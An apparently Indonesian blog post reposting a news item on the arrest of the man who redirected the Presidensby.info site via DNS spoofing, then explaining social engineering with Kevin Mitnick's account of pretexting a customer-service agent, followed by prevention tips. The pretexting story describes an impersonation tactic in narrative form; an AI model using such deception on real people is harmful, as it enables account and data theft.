Memang sampai sekarang belum ada konfirmasi resmi apakah Wildan, sang pengganti tampilan situs Presidensby.info tersebut dikategorikan apa, namun ada perkiraan bahwa dia hanyalah seorang lamers atau biasa juga disebut Script Kiddies.

Beberapa hari kemarin, pihak kepolisian berhasil menangkap seseorang yang telah mengganti tampilan website pemerintah, Presidensby.info. Sang pelaku yang diketahui bernama Wildan Yani S Hari (22) ini hanyalah seseorang lulusan STM saja.

Dari aksi tersebut, pihak kepolisian menjelaskan bahwa Wildan tidak mempunyai tujuan khusus atau memiliki muatan politis. Dia melakukannya hanya sekadar iseng belaka.

Memang setelah website kembali dapat dioperasikan seperti semula, tidak ada kerusakan di dalam internal situs karena yang dilakukan Wildan hanyalah mengubah tampilan depannya saja.

Dalam penjelasannya, Tifatul Sembiring, Menkominfo, mengatakan, "Sebetulnya yang terjadi bukan hacking atau peretasan dalam situs presiden tapi mengalihkan IP address yang ada di DNS (Domain Name System) yang ada di soft player di Texas. Itu pun pulih dalam beberapa jam kemudian karena masih dalam tanggung jawabnya DNS server itu."

Menurut Herdian Ferdianto, founder PT Simetri sekaligus pengamat IT di Indonesia menjelaskan bahwa pengalihan IP itu disebut juga dengan istilah DNS Spoofing. Apa itu DNS Spoofing?

DNS Spoofing adalah teknik khusus yang digunakan untuk mengambil alih DNS server sehingga DNS atau layanan yang menyimpan nama domain dan IP address sebuah situs akan dialihkan ke server sang pelaku.

Memang ketika orang lain mencoba mengakses situs yang DNS-nya telah dibelokkan akan mengira bahwa website tersebut telah di-deface atau di-hack, namun sebenarnya website tetap beroperasi normal hanya DNS-nya saja yang dialihkan ke 'jalan' yang lain.

Mengacu pada aksi yang dilakukan Wildan ini, muncul pertanyaan apakah dia termasuk defacer atau jangan-jangan sudah masuk dalam kategori kelas atas. Berdasarkan informasi yang berhasil dikumpulkan merdeka.com, ternyata Wildan tidak hanya sekali ini saja melakukan aksinya. Sudah banyak website lain yang juga menjadi korban ulah jahilnya.

Sumber : http://www.merdeka.com/teknologi/sekilas-tentang-dns-spoofing.html

Apa itu social engineering ?

Apa itu social engineering ?

Apa itu social engineering ?

Social Engineering adalah sebuah teknik pendekatan yang memanfaatkan aspek-aspek sosial di dunia komputer dan internet. Teknik ini biasanya digunakan untuk mendapatkan data-data pribadi seseorang untuk keperluan yang negatif seperti pencurian rekening bank, pencurian password, pencurian akun-akun tertentu atau kejahatan teknologi yang berpotensi lainnya. Semua hal ini dilakukan oleh para hacker dan sejenisnya. Para hacker memanfaatkan kelemahan suatu sistem yaitu manusia, karena tidak ada sitem di dunia ini yang tidak melibatkan interaksi manusia. Secanggih apapun teknologi internet tetap membutuhkan manusia, kelemahan ini bersifat universal, tidak tergantung platform, sistem informasi, protokol, software ataupun hardware. Intinya, semua sistem memiliki kekurangan yang sama pada satu titik yaitu pada faktor sosial manusia.

Social Engineering ini bisa terjadi karena banyak faktor, diantaranya adalah faktor kecerobohan seorang user dalam mengelola passwordnya atau bisa juga seorang hacker berpura-pura menajdi orang yang berkepentingan dalam sebuah sistem dan seolah-olah memerlukan password, akses ke jaringan, peta jaringan, konfigurasi sistem dan semacamnya untuk suatu keperluan tertentu. Masih banyak faktor-faktor lainnnya yang semua itu merupakan diri manusia itu sendiri.

Contoh lainnya adalah hacker berpura-pura sedang melakukan perbaikan sistem akun perbankan dan mengirimkan informasi itu kepada para nasabah bank. Hacker kemudian memerintahkan memasukkan data-data pribadinya untuk keperluan tersebut. Hacker tentu saja berusaha untuk membuat percaya nasabah bahwa informasi itu benar-benar dari kantor induk bank dengan melampirkan nama dan alamat nasabah sehingga nasabah tertipu. Hackerpun kemudian bisa dengan mudah mendapatkan password atau semacamnya karena nasabahlah yang menuliskannya sendiri.

Metode Social Engineering

Dalam dunia Social Engineering ada dua metode yang digunakan pelaku, yaitu: berbasis interaksi sosial dan berbasis interaksi Komputer.

Adapun metode yang berbasis interaksi sosial dapat diilustrasikan dari kisah Master Social Engineering yang melegenda yaitu Kevin Mitnick, cerita yang dikisahkan Mitnick sendiri pada sebuah forum online Slasdot.org. berikut Ceritanya: “Pada satu kesempatan, saya ditantang oleh seorang teman untuk mendapatkan nomor (telepon) Sprint Foncard-nya. Ia mengatakan akan membelikan makan malam jika saya bisa mendapatkan nomor itu. Saya tidak akan menolak makan enak, jadi saya berusaha dengan menghubungi Customer Service dan perpura-pura sebagai seorang dari bagian teknologi informasi. Saya tanyakan pada petugas yang menjawab apakah ia mengalami kesulitan pada sitem yang digunakan. Ia bilang tidak, saya tanyakan sistem yang digunakan untuk mengakses data pelanggan, saya berpura-pura ingin memverifikasi. Ia menyebutkan nama sistemnya.”

“Setelah itu saya kembali menelepon Costumer Service dan dihubungkan dengan petugas yang berbeda. Saya bilang bahwa komputer saya rusak dan saya ingin melihat data seorang pelanggan. Ia mengatakan data itu sudah berjibun pertanyaan. Siapa nama anda? Anda kerja buat siapa? Alamat anda dimana? Yah, seperti itulah. Karena saya kurang riset, saya mengarang nama dan tempat saja. Gagal. Ia bilang akan melaporkan telepon-telepon ini pada keamanan.” “Karena saya mencatat namanya, saya membawa seorang teman dan memberitahukannya tentang situasi yang terjadi. Saya meminta teman itu untuk menyamar sebagai ‘penyelidik keamanan’ untuk mencatat laporan dari petugas Customer Service dan berbicara dengan petugas tadi. Sebagai ‘penyelidik’ ia mengatakan menerima laporan adanya orang berusaha mendapatkan informasi pribadinya pelanggan. Setelah tanya jawab soal telepon tadi, ‘penyelidik menanyakan apa informasi yang diminta penelepon tadi. Petugas itu bilang nomor Foncard. ‘penyelidik’ bertanya, memang berapa nomornya? Dan petugas itu memberikan nomornya. Oops. Kasus selesai.”

Selanjutnya, Metode yang berbasis interaksi komputer yaitu teknik phising melalui e-mail, SMS, dan Pop up windows. Setelah membaca penjelasan diatas , lalu bagaimana solusi supaya terhindar dari kejahatan Social Engineering? Ini dia Tips bagi pembaca untuk menghindari kejahatan Social Engineering:

  1. Selalu Hati-hati, jikalau bertemu dengan yang baru dikenal jangan asal percaya, dan jangan langsung membagi informasi pribadi begitu saja.
  2. Belajar dari pengalaman orang lain, baik melalui buku, internet, acara tekevisi, dll.
  3. Pelatihan dan sosialisasi dari perusahaan ke karyawan dan unit-unit terkait mengenai pentingnya mengelola keamanan informasi melalui berbagai cara dan kiat.
  4. Organisasi atau perusahaan mengeluarkan sebuah buku saku berisi panduan mengamankan informasi yang mudah dimengerti dan diterapkan oleh pegawainya untuk mengurangi insiden-insiden yang tidak diinginkan.
Batman Begins - Help Select